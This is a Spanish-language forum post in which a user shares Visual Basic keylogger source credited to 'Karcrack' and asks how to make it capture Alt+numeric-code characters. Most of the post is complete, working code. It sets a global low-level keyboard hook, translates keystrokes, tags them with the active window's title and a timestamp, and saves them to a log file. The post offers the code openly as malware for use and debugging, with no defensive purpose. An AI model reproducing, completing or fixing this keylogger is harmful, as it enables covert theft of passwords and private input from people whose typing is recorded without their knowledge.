Problemas con un Keylogger con HOOK

Iniciado por Anteros, 5 Agosto 2010, 22:37 PM

0 Miembros y 1 Visitante están viendo este tema.

Anteros


Holas gente

Buscando por el foro y encontre un code muy interesante elaborado por Karcrack  para poder construir un keylogger con hook y no con timer :) 

Pero el problema es q lo estuve probando y  no guarda las combinaciones con la tecla Alt para los codigos ascii (ni siquiera cnd esta se presiona sola)

Por ejem:

Si presiono Alt+64= @,
Alt+93= ], Alt+36= $ ... etc, etc  ... No las guarda en el log

Caso contrario con el shift q combinada con otra tecla, si la guarda correctamente

A q se debe esto?? Como podria arreglarlo??

Este es el code


Option Explicit

'|||||||||||||||||||||||
'|                     |
'|Autor: Karcrack      |
'|Fecha: 24/09/08      |
'|                     |
'|||||||||||||||||||||||


Private Declare Function SetWindowsHookEx Lib "user32.dll" Alias "SetWindowsHookExA" (ByVal idHook As Long, ByVal lpfn As Long, ByVal hmod As Long, ByVal dwThreadId As Long) As Long
Private Declare Function UnhookWindowsHookEx Lib "user32.dll" (ByVal hHook As Long) As Long
Private Declare Function CallNextHookEx Lib "user32.dll" (ByVal hHook As Long, ByVal nCode As Long, ByVal wParam As Long, ByRef lParam As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal vKey As Long) As Integer
Private Const WH_KEYBOARD_LL   As Long = 13

Private Declare Function GetForegroundWindow Lib "user32.dll" () As Long
Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long

Public Type KBDLLHOOKSTRUCT
    VkCode                  As Long
    ScanCode                As Long
    Flags                   As Long
    Time                    As Long
    DwExtraInfo             As Long
End Type

Dim KBHook                  As Long
Dim KeyData                 As String
Dim lHwnd                   As Long

Public Sub ManageKeylogger(ByVal Enable As Boolean)
    Select Case Enable
        Case True
            KBHook = SetWindowsHookEx(WH_KEYBOARD_LL, AddressOf KBProc, App.hInstance, 0)
        Case False
            Call UnhookWindowsHookEx(KBHook)
    End Select
End Sub

Public Function KBProc(ByVal nCode As Long, ByVal wParam As Long, lParam As Long) As Long
    Dim KeyBoardHook        As KBDLLHOOKSTRUCT

    If nCode = 0 Then
        CopyMemory KeyBoardHook, lParam, Len(KeyBoardHook)
        With KeyBoardHook
            If .Flags = 0 Or .Flags = 1 Then
                If SaveLog(TranslateKey(.VkCode)) > 50 Then
                    Call LogToFile(App.Path & "\Log.log")
                End If
            End If
        End With
    Else
        KBProc = CallNextHookEx(KBHook, nCode, wParam, lParam)
    End If
End Function

Private Function TranslateKey(ByVal KeyCode As Long) As String
    Dim LngShift            As Long

    'Funcion optimizada para su uso en teclados españoles.

    LngShift = GetAsyncKeyState(vbKeyShift)
    If KeyCode >= 58 And KeyCode <= 90 Then
        TranslateKey = IIf(LngShift <> 0, UCase(Chr(KeyCode)), LCase(Chr(KeyCode)))
    ElseIf KeyCode >= 96 And KeyCode <= 105 Then
        TranslateKey = Chr(KeyCode - 48)
    ElseIf KeyCode >= 112 And KeyCode <= 123 Then
        TranslateKey = "{F" & KeyCode - 111 & "}"
    Else
        If KeyCode = 160 Then TranslateKey = ""
        If KeyCode = 161 Then TranslateKey = "{SHIFT DER.}"
        If KeyCode = 38 Then TranslateKey = "{FLECHA ARRIBA}"
        If KeyCode = 40 Then TranslateKey = "{FLECHA ABAJO}"
        If KeyCode = 37 Then TranslateKey = "{FLECHA IZQ.}"
        If KeyCode = 39 Then TranslateKey = "{FLECHA DER.}"
        If KeyCode = 32 Then TranslateKey = "{ESPACIO}"
        If KeyCode = 27 Then TranslateKey = "{ESC}"
        If KeyCode = 46 Then TranslateKey = "{DEL}"
        If KeyCode = 36 Then TranslateKey = "{HOME}"
        If KeyCode = 35 Then TranslateKey = "{END}"
        If KeyCode = 33 Then TranslateKey = "{PAGE UP}"
        If KeyCode = 34 Then TranslateKey = "{PAGE DOWN}"
        If KeyCode = 45 Then TranslateKey = "{PASTE}"
        If KeyCode = 144 Then TranslateKey = "{NUM}"
        If KeyCode = 111 Then TranslateKey = "{NUMPAD / }"
        If KeyCode = 106 Then TranslateKey = "{NUMPAD * }"
        If KeyCode = 109 Then TranslateKey = "{NUMPAD - }"
        If KeyCode = 107 Then TranslateKey = "{NUMPAD + }"
        If KeyCode = 13 Then TranslateKey = "{ENTER}"
        If KeyCode = 8 Then TranslateKey = "{BACK}"
        If KeyCode = 221 Then TranslateKey = "{ACCENTO}"
        If KeyCode = 9 Then TranslateKey = "{TAB}"
        If KeyCode = 20 Then TranslateKey = "{BLOQ. MAYUS}"
        If KeyCode = 162 Then TranslateKey = "{STRG LEFT}"
        If KeyCode = 163 Then TranslateKey = "{STRG DER.}"
        If KeyCode = 91 Then TranslateKey = "{WINDOWS}"
        If KeyCode = 164 Then TranslateKey = "{ALT}"
        If KeyCode = 165 Then TranslateKey = "{ALTGR}"
        If KeyCode = 93 Then TranslateKey = "{MENU CONTEXTUAL}"
        If KeyCode = 188 Then TranslateKey = IIf(LngShift <> 0, ";", ",")
        If KeyCode = 190 Then TranslateKey = IIf(LngShift <> 0, ":", ".")
        If KeyCode = 189 Then TranslateKey = IIf(LngShift <> 0, "_", "-")
        If KeyCode = 191 Then TranslateKey = IIf(LngShift <> 0, "'", "#")
        If KeyCode = 187 Then TranslateKey = IIf(LngShift <> 0, "*", "+")
        If KeyCode = 186 Then TranslateKey = IIf(LngShift <> 0, "Ü", "ü")
        If KeyCode = 192 Then TranslateKey = IIf(LngShift <> 0, "Ö", "ö")
        If KeyCode = 222 Then TranslateKey = IIf(LngShift <> 0, "Ä", "ä")
        If KeyCode = 219 Then TranslateKey = IIf(LngShift <> 0, "?", "ß")
        If KeyCode = 220 Then TranslateKey = IIf(LngShift <> 0, "°", "^")
        If KeyCode = 48 Then TranslateKey = IIf(LngShift <> 0, "=", "0")
        If KeyCode = 49 Then TranslateKey = IIf(LngShift <> 0, "!", "1")
        If KeyCode = 50 Then TranslateKey = IIf(LngShift <> 0, """", "2")
        If KeyCode = 51 Then TranslateKey = IIf(LngShift <> 0, "§", "3")
        If KeyCode = 52 Then TranslateKey = IIf(LngShift <> 0, "$", "4")
        If KeyCode = 53 Then TranslateKey = IIf(LngShift <> 0, "%", "5")
        If KeyCode = 54 Then TranslateKey = IIf(LngShift <> 0, "&", "6")
        If KeyCode = 55 Then TranslateKey = IIf(LngShift <> 0, "/", "7")
        If KeyCode = 56 Then TranslateKey = IIf(LngShift <> 0, "(", "8")
        If KeyCode = 57 Then TranslateKey = IIf(LngShift <> 0, ")", "9")
        If KeyCode = 145 Then TranslateKey = "{ROLL}"
        If KeyCode = 44 Then TranslateKey = "{PRINT}"
        If KeyCode = 19 Then TranslateKey = "{PAUSE}"
        If TranslateKey = "" And KeyCode <> 160 Then TranslateKey = KeyCode
    End If
End Function

Public Function SaveLog(ByVal sKey As String) As Double
    Dim aHwnd               As Long
    Dim WinText             As String
    aHwnd = GetForegroundWindow

    If aHwnd <> lHwnd Then
        lHwnd = aHwnd
        WinText = String$(255, Chr$(0))
        Call GetWindowText(aHwnd, WinText, Len(WinText))
        WinText = Left$(WinText, InStr(WinText, Chr$(0)) - 1)

        KeyData = KeyData & vbCrLf & "{" & WinText & "} - [" & Now() & "]" & vbCrLf
    End If

    KeyData = KeyData & sKey

    SaveLog = Len(KeyData)
End Function

Public Sub LogToFile(ByVal sPath As String)
    Open sPath For Binary As #1
        Put #1, , KeyData
    Close #1
End Sub



Gracias por todo


Sanlegas